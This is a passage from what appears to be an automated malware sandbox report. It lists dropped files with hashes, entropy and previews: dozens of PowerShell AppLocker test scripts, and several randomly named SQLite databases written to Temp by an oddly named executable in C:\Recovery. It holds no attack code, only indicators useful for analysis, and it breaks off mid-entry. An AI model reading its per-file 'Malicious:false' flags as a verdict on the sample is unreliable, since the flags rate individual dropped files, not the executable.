                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy5k4rwf.yk5.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pe2xa3x1.0sw.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxxgy4s3.lq4.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rasrnn1u.i5m.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_renrnrox.fxd.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ry5bkliq.ivn.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smrlqikd.rdz.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tiaclv3i.um3.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_todtt4on.4sg.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trruo2qq.il5.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tyfvppas.lhx.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u33uhrpt.hwy.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulgrdo1o.rhp.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxarfwdz.554.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v3i1zkot.jrs.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vboazn5d.ozv.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbumelib.lrq.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vn2ucerx.agj.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vpmkfog4.qvr.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w5necmd5.e4k.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yjvkozix.axd.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\a1NnZvBgsu

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\a5ORZeMzM9

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\aNsVLwDMgB

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\aWIzCKI7Ed

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\aYb8btJIU7

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):20480
                                                                                Entropy (8bit):0.5712781801655107
                                                                                Encrypted:false
                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\alQwopP9ux

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):2.5793180405395284
                                                                                Encrypted:false
                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\anzZHo5N42

                                                                                Download File
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
